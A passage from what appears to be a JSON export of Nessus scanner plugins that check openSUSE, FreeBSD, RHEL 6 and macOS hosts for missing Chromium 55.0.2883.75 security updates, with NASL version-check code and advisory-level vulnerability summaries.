script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-debuginfo-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debuginfo-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debugsource-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-debuginfo-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromedriver-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromedriver-debuginfo-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-debuginfo-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-debugsource-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromedriver-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromedriver-debuginfo-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromium-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromium-debuginfo-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromium-debugsource-55.0.2883.75-99.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-23T11:02:34", "bulletinFamily": "scanner", "description": "Google Chrome Releases reports :\n\n36 security fixes in this release\n\nPlease reference CVE/URL list for details", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_603FE0A1BB2611E68E5A3065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/95546", "published": "2016-12-06T00:00:00", "title": "FreeBSD : chromium -- multiple vulnerabilities (603fe0a1-bb26-11e6-8e5a-3065ec8fd3ec)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95546);\n script_version(\"2.13\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (603fe0a1-bb26-11e6-8e5a-3065ec8fd3ec)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n36 security fixes in this release\n\nPlease reference CVE/URL list for details\"\n );\n # https://googlechromereleases.blogspot.nl/2016/12/stable-channel-update-for-desktop.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8c43db9d\"\n );\n # https://vuxml.freebsd.org/freebsd/603fe0a1-bb26-11e6-8e5a-3065ec8fd3ec.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?494cb236\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-npapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<55.0.2883.75\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-npapi<55.0.2883.75\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<55.0.2883.75\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-23T12:16:16", "bulletinFamily": "scanner", "description": "An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 55.0.2883.75.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Chromium\nto crash, execute arbitrary code, or disclose sensitive information\nwhen visited by the victim. (CVE-2016-5203, CVE-2016-5204,\nCVE-2016-5205, CVE-2016-5206, CVE-2016-5207, CVE-2016-5208,\nCVE-2016-5209, CVE-2016-5210, CVE-2016-5211, CVE-2016-5212,\nCVE-2016-5213, CVE-2016-9651, CVE-2016-9652, CVE-2016-5214,\nCVE-2016-5215, CVE-2016-5216, CVE-2016-5217, CVE-2016-5218,\nCVE-2016-5219, CVE-2016-5220, CVE-2016-5221, CVE-2016-5222,\nCVE-2016-5223, CVE-2016-5224, CVE-2016-5225, CVE-2016-5226,\nCVE-2016-9650)", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2016-2919.NASL", "href": "https://www.tenable.com/plugins/nessus/95622", "published": "2016-12-08T00:00:00", "title": "RHEL 6 : chromium-browser (RHSA-2016:2919)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2919. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95622);\n script_version(\"3.19\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_xref(name:\"RHSA\", value:\"2016:2919\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2016:2919)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 55.0.2883.75.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Chromium\nto crash, execute arbitrary code, or disclose sensitive information\nwhen visited by the victim. (CVE-2016-5203, CVE-2016-5204,\nCVE-2016-5205, CVE-2016-5206, CVE-2016-5207, CVE-2016-5208,\nCVE-2016-5209, CVE-2016-5210, CVE-2016-5211, CVE-2016-5212,\nCVE-2016-5213, CVE-2016-9651, CVE-2016-9652, CVE-2016-5214,\nCVE-2016-5215, CVE-2016-5216, CVE-2016-5217, CVE-2016-5218,\nCVE-2016-5219, CVE-2016-5220, CVE-2016-5221, CVE-2016-5222,\nCVE-2016-5223, CVE-2016-5224, CVE-2016-5225, CVE-2016-5226,\nCVE-2016-9650)\"\n );\n # https://googlechromereleases.blogspot.com/2016/12/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://chromereleases.googleblog.com/2016/12/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5204\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5205\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5207\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5208\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5211\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5214\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5217\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5220\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5224\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5225\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9651\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9652\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2919\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-55.0.2883.75-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-55.0.2883.75-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-55.0.2883.75-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-55.0.2883.75-1.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-23T11:27:02", "bulletinFamily": "scanner", "description": "The version of Google Chrome installed on the remote macOS or Mac OS X\nhost is prior to 55.0.2883.75. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A use-after-free error exists in PDFium in the\n Document::removeField() function within file\n fpdfsdk/javascript/Document.cpp when removing fields\n within a document. An unauthenticated, remote attacker\n can exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code.\n (CVE-2016-5203)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to improper handling of the ", "modified": "2019-11-02T00:00:00", "id": "MACOSX_GOOGLE_CHROME_55_0_2883_75.NASL", "href": "https://www.tenable.com/plugins/nessus/95481", "published": "2016-12-02T00:00:00", "title": "Google Chrome < 55.0.2883.75 Multiple Vulnerabilities (macOS)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95481);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2016-5203\",\n \"CVE-2016-5204\",\n \"CVE-2016-5205\",\n \"CVE-2016-5206\",\n \"CVE-2016-5207\",\n \"CVE-2016-5208\",\n \"CVE-2016-5209\",\n \"CVE-2016-5210\",\n \"CVE-2016-5211\",\n \"CVE-2016-5212\",\n \"CVE-2016-5213\",\n \"CVE-2016-5214\",\n \"CVE-2016-5215\",\n \"CVE-2016-5216\",\n \"CVE-2016-5217\",\n \"CVE-2016-5218\",\n \"CVE-2016-5219\",\n \"CVE-2016-5220\",\n \"CVE-2016-5221\",\n \"CVE-2016-5222\",\n \"CVE-2016-5223\",\n \"CVE-2016-5224\",\n \"CVE-2016-5225\",\n \"CVE-2016-5226\",\n \"CVE-2016-9650\",\n \"CVE-2016-9651\",\n \"CVE-2016-9652\"\n );\n script_bugtraq_id(94633);\n\n script_name(english:\"Google Chrome < 55.0.2883.75 Multiple Vulnerabilities (macOS)\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS or Mac OS X\nhost is prior to 55.0.2883.75. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A use-after-free error exists in PDFium in the\n Document::removeField() function within file\n fpdfsdk/javascript/Document.cpp when removing fields\n within a document. An unauthenticated, remote attacker\n can exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code.\n (CVE-2016-5203)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to improper handling of the 'use'\n SVG element when calling event listeners on a cloned\n node. An unauthenticated, remote attacker can exploit\n this to execute arbitrary script code in a user's\n browser session. (CVE-2016-5204)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to permitting frame swaps during\n frame detach. An unauthenticated, remote attacker can\n exploit this to execute arbitrary script code in a\n user's browser session. (CVE-2016-5205)\n\n - A security bypass vulnerability exists in PDFium due to\n a flaw in the DocumentLoader::GetRequest() function\n within file pdf/document_loader.cc when handling\n redirects in the plugin. An unauthenticated, remote\n attacker can exploit this to bypass the same-origin\n policy. (CVE-2016-5206)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink, specifically in the\n V8EventListener::getListenerFunction() function within\n file bindings/core/v8/V8EventListener.cpp, due to\n allowing the 'handleEvent' getter to run on forbidden\n scripts. An unauthenticated, remote attacker can exploit\n this to execute arbitrary script code in a user's\n browser session. (CVE-2016-5207)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to improper handling of triggered\n events (e.g., closing a color chooser for an input\n element). An unauthenticated, remote attacker can\n exploit this to execute arbitrary script code in a\n user's browser session. (CVE-2016-5208)\n\n - An out-of-bounds write error exists in Blink due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-5209)\n\n - An out-of-bounds write error exists in PDFium in the\n CWeightTable::GetPixelWeightSize() function within file\n core/fxge/dib/fx_dib_engine.cpp. An unauthenticated,\n remote attacker can exploit this to corrupt memory,\n resulting in a denial of service condition or the\n execution of arbitrary code. (CVE-2016-5210)\n\n - An unspecified use-after-free error exists in PDFium due\n to improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code.\n (CVE-2016-5211)\n\n - A unspecified flaw exists in the DevTools component due\n to improper validation of certain URLs that allows an\n unauthenticated, remote attacker to disclose the content\n of arbitrary files. (CVE-2016-5212)\n\n - Multiple use-after-free errors exist in the inspector\n component in V8 that allow an unauthenticated, remote\n attacker to execute arbitrary code. (CVE-2016-5213,\n CVE-2016-5219)\n\n - A file download protection bypass vulnerability exists\n when downloading files that involve 'data:' URIs,\n unknown URI schemes, or overly long 